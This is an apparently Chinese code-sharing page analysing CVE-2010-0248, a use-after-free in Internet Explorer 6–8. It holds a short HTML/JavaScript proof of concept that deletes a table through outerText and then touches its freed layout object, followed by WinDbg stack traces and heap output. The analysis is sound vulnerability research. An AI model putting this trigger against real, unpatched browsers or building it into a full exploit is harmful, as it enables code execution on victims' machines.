首页 > 代码库 > CVE-2010-0248
CVE-2010-0248
[CNNVD]Microsoft Internet Explorer 多个远程代码执行漏洞(CNNVD-201001-237)
Microsoft Internet Explorer 6, 6 SP1, 7, 和 8版本没有适当地处理内存中的对象,这可能会允许远程攻击者通过访问(1)未被适当初始化的或(2)被删除的一个对象,执行任意代码。该漏洞会引起内存破坏,它又称为"未初始化内存漏洞"。
POC
<html><body><table id="test"> <tr></tr> </table><script>Math.tan(2,3);var test = document.getElementById("test");Math.sin(0);var x = test.cells.item(0);Math.cos(0);test.outerText = ‘test text‘; // 删除表格Math.tan(2,3);x = test.cells.item(0); // 再试图引用表格的元素,此时将访问已释放的内存</script></body></html>
重利用
1:020> reax=0644efa0 ebx=00000078 ecx=00000000 edx=00000000 esi=00000078 edi=06e0bfd8eip=685dbb57 esp=0429ef60 ebp=0429efa8 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206mshtml!CTableCellsCollectionCacheItem::GetNext+0x12:685dbb57 3b4854 cmp ecx,dword ptr [eax+54h] ds:0023:0644eff4=????????1:020> kvChildEBP RetAddr Args to Child 0429ef60 68404383 00000000 063ecfd0 00000078 mshtml!CTableCellsCollectionCacheItem::GetNext+0x12 (FPO: [0,0,1])0429efa8 68404319 063ecfd0 07cbcc18 00000004 mshtml!CCollectionCache::GetIntoAry+0x4e0429efec 684044a2 00000002 07cbcc18 0429f0d8 mshtml!CCollectionCache::GetDispID+0x13e0429f000 684190d4 063ecfd0 00000002 07cbcc18 mshtml!DispatchGetDispIDCollection+0x3f0429f028 683f1e59 06e0dfd8 07cbcc18 10000001 mshtml!CElementCollectionBase::VersionedGetDispID+0x460429f06c 68a3a304 06657fd8 07cbcc18 10000001 mshtml!PlainGetDispID+0xdc0429f09c 68a3a272 07cbcc18 0429f0d8 06657fd8 jscript!IDispatchExGetDispID+0xa50429f0b4 68a3a47a 05646d10 0429f0d8 00000001 jscript!GetDex2DispID+0x310429f0e0 68a4d8c8 05646d10 0429f114 00000003 jscript!VAR::InvokeByName+0xee0429f12c 68a4d96f 05646d10 00000003 0429f2ac jscript!VAR::InvokeDispName+0x7d0429f158 68a451b6 05646d10 00000000 00000003 jscript!VAR::InvokeByDispID+0xce0429f2f4 68a45c9d 0429f30c 0429f450 07ccaf88 jscript!CScriptRuntime::Run+0x2a970429f3dc 68a45bfb 0429f450 00000000 00000000 jscript!ScrFncObj::CallWithFrameOnStack+0xce0429f424 68a45e11 0429f450 00000000 00000000 jscript!ScrFncObj::Call+0x8d0429f4a0 68a4612a 07ccaf88 0429f660 00000000 jscript!CSession::Execute+0x15f0429f4ec 68a4c2d9 0563cdf0 0429f660 0429f670 jscript!COleScript::ExecutePendingScripts+0x1bd0429f550 68a4c0f1 0563cdf0 071a2fec 68336970 jscript!COleScript::ParseScriptTextCore+0x2a40429f578 683368c7 0563cdf4 06e30e14 071a2fec jscript!COleScript::ParseScriptText+0x300429f5d0 683366bf 0711cfa8 00000000 07184f30 mshtml!CScriptCollection::ParseScriptText+0x2180429f694 68336c35 00000000 00000000 00000000 mshtml!CScriptElement::CommitCode+0x3ae
释放
1:021> reax=681c95f8 ebx=07762fc0 ecx=06572fa0 edx=057b1980 esi=06572fa0 edi=07762fc0eip=683e2f5b esp=041aedf0 ebp=041aee0c iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CLayout::Release:683e2f5b 8bff mov edi,edi1:021> kvChildEBP RetAddr Args to Child 041aedec 683e32d0 06572fa0 00000000 07762fc0 mshtml!CLayout::Release041aee0c 68387da7 0676ef30 00000000 041aef78 mshtml!CElement::Passivate+0xce041aee1c 683e0fdf 07762fc0 00000000 682c660e mshtml!CBase::PrivateRelease+0x2d041aee28 682c660e 0676ef30 00000000 00000018 mshtml!CElement::PrivateExitTree+0x11 (FPO: [0,0,1])041aef78 682c5b42 041af09c 7728517e 00000000 mshtml!CSpliceTreeEngine::RemoveSplice+0x841041af058 682c6ff9 041af090 041af09c 00000000 mshtml!CMarkup::SpliceTreeInternal+0x83041af0a8 682c6f39 041af108 041af144 00000001 mshtml!CDoc::CutCopyMove+0xca041af0c4 682c6f17 041af108 041af144 00000000 mshtml!CDoc::Remove+0x18041af0dc 681f288a 041af144 07799fb8 07a54c58 mshtml!RemoveWithBreakOnEmpty+0x3a041af180 682c704a 00000001 00000000 07a54c58 mshtml!CElement::InjectInternal+0x32a041af19c 6850aee9 07799fb8 00000001 00000000 mshtml!CElement::InjectCompatBSTR+0x46041af1c0 684072d6 07799fb8 07a54c58 07a72fd0 mshtml!CElement::put_outerText+0x25041af1f0 683f235c 07799fb8 07a72fd0 0771efd8 mshtml!GS_BSTR+0x1ac041af264 683fc75a 07799fb8 80010405 00000001 mshtml!CBase::ContextInvokeEx+0x5dc041af2b4 6826f1e5 07799fb8 80010405 00000001 mshtml!CElement::ContextInvokeEx+0x9d041af2f8 683a3104 07799fb8 80010405 00000001 mshtml!CTable::VersionedInvokeEx+0xbf041af34c 6baca22a 04fbefd8 80010405 00000001 mshtml!PlainInvokeEx+0xeb041af388 6baca175 070fed10 80010405 00000409 jscript!IDispatchExInvokeEx2+0x104041af3c4 6baca3f6 070fed10 00000409 00000004 jscript!IDispatchExInvokeEx+0x6a041af484 6baca4a0 80010405 00000004 00000000 jscript!InvokeDispatchEx+0x98
分配
1:021> !heap -p -a 06572fa0 address 06572fa0 found in _DPH_HEAP_ROOT @ 191000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 65b25e4: 6572fa0 5c - 6572000 2000 mshtml!CTableRowLayout::`vftable‘ 70228e89 verifier!AVrfDebugPageHeapAllocate+0x00000229 77284ea6 ntdll!RtlDebugAllocateHeap+0x00000030 77247d96 ntdll!RtlpAllocateHeap+0x000000c4 772134ca ntdll!RtlAllocateHeap+0x0000023a 68319b3b mshtml!GetLayoutFromFactory+0x00000697 683bdf7b mshtml!CElement::CreateLayout+0x00000021 682bd56d mshtml!CTableRow::RowLayoutCache+0x00000043 682bcff2 mshtml!CTableRow::Notify+0x00000176 6830780a mshtml!CHtmRootParseCtx::FlushNotifications+0x000001bf 68306bb5 mshtml!CHtmRootParseCtx::Commit+0x0000000a 682f77cf mshtml!CHtmPost::Broadcast+0x0000000f 682f7924 mshtml!CHtmPost::Exec+0x00000255 682f8a99 mshtml!CHtmPost::Run+0x00000015 682f89fd mshtml!PostManExecute+0x000001fb 682f95b6 mshtml!CPostManager::PostManOnTimer+0x00000134 683994b2 mshtml!GlobalWndOnMethodCall+0x000000ff 683837f7 mshtml!GlobalWndProc+0x0000010c 76c686ef USER32!InternalCallWinProc+0x00000023 76c68876 USER32!UserCallWinProcCheckWow+0x0000014b 76c689b5 USER32!DispatchMessageWorker+0x0000035e 76c68e9c USER32!DispatchMessageW+0x0000000f 6ea704a6 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000452 6ea80446 IEFRAME!LCIETab_ThreadProc+0x000002c1 76a749bd iertutil!CIsoScope::RegisterThread+0x000000ab 77111174 kernel32!BaseThreadInitThunk+0x0000000e 7721b3f5 ntdll!__RtlUserThreadStart+0x00000070 7721b3c8 ntdll!_RtlUserThreadStart+0x0000001b
<table id="test"> <tr></tr> </table>
创建了CTableRowLayout对象
test.outerText = ‘test text‘;
释放了CTableRowLayout对象
x = test.cells.item(0);
悬垂指针引用了CTableRowLayout对象
为什么会解引用已释放的对象?悬垂指针是怎么产生的?
CVE-2010-0248
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。